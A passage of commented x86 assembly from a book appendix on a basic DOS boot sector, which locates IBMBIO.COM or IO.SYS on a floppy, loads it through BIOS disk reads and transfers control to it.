DEC AX ;decrement by 1
DIV BX ;ax=# sectors in root dir
ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data
MOV BX,OFFSET DISK_BUF ;set up disk buffer @ 0000:0500
POP AX
CALL CONVERT ;convert sec # to bios data
MOV AL,1 ;prepare for 1 sector disk read
CALL READ_DISK ;go read it
MOV DI,BX ;compare first file on disk
MOV CX,11 ;with required file name of
MOV SI,OFFSET SYSFILE_1 ;first system file for PC DOS
REPZ CMPSB
JZ SYSTEM_THERE ;ok, found it, go load it
MOV DI,BX ;compare first file with
MOV CX,11 ;required file name of
MOV SI,OFFSET SYSFILE_2 ;first system file for MS DOS
REPZ CMPSB
ERROR2: JNZ ERROR2 ;not the same - an error,
;so hang the machine
;Ok, system file is there, so load it
SYSTEM_THERE:
MOV AX,WORD PTR [DISK_BUF+1CH]
XOR DX,DX ;get size of IBMBIO.COM/IO.SYS
DIV WORD PTR [SEC_SIZE] ;and divide by sector size
INC AL ;ax=number of sectors to read
MOV BP,AX ;store that number in BP
MOV AX,WORD PTR [DOS_ID] ;get sector # of start of data
PUSH AX
MOV BX,700H ;set disk buffer to 0000:0700
RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read
CALL CONVERT ;convert to bios Trk/Cyl/Sec
MOV AL,1 ;read one sector
CALL READ_DISK ;go read the disk
SUB BP,1 ;# sectors to read - 1
JZ DO_BOOT ;and quit if we’re done
ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to
ADD BX,WORD PTR [SEC_SIZE] ;read and update buffer address
JMP RD_BOOT1 ;then go for another
Appendix C: A Basic Boot Sector 120
;Ok, the first system file has been read in, now transfer control to it
DO_BOOT:
MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch
MOV DL,BYTE PTR [DRIVE] ;Drive number in dl
POP BX
JMP FAR PTR LOAD ;and transfer control to op sys
;Convert sequential sector number in ax to BIOS Track, Head, Sector
;information. Save track number in DX, sector number in CH,
CONVERT:
XOR DX,DX
DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track
INC DL ;dl=sector # to start read on
MOV CH,DL ;save it here
XOR DX,DX ;al=track/head count
DIV WORD PTR [HEADS] ;divide ax by head count
MOV BYTE PTR [HEAD],DL ;dl=head number, save it
MOV DX,AX ;ax=track number, save it in dx
RET
;Read the disk for the number of sectors in al, into the buffer es:bx, using
;the track number in DX, the head number at HEAD, and the sector
;number at CH.
READ_DISK:
MOV AH,2 ;read disk command
MOV CL,6 ;shift upper 2 bits of trk #
SHL DH,CL ;to the high bits in dh
OR DH,CH ;and put sec # in low 6 bits
MOV CX,DX
XCHG CH,CL ;ch (0-5) = sector,
;cl, ch (6-7) = track
MOV DL,BYTE PTR [DRIVE] ;get drive number from here
MOV DH,BYTE PTR [HEAD] ;and head number from here
INT 13H ;go read the disk
ERROR3: JC ERROR3 ;hang in case of an error
RET
;Move data that doesn’t change from this boot sector to the one read in at
;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and
;the data area at the beginning of the boot sector.
MOVE_DATA:
MOV SI,OFFSET DSKBASETBL ;Move boot sec code after data
MOV DI,OFFSET DISK_BUF+(OFFSET DSKBASETBL-OFFSET BOOTSEC)
MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL
REP MOVSB
MOV SI,OFFSET BOOTSEC ;Move initial jump and sec ID
MOV DI,OFFSET DISK_BUF
MOV CX,11
REP MOVSB
RET
SYSFILE_1: DB ’IBMBIO COM’ ;PC DOS System file
SYSFILE_2: DB ’IO SYS’ ;MS DOS System file
ORG 7DFDH
DRIVE: DB 0 ;Disk drive for boot sector
BOOT_ID: DW 0AA55H ;Boot sector ID word
MAIN ENDS
END START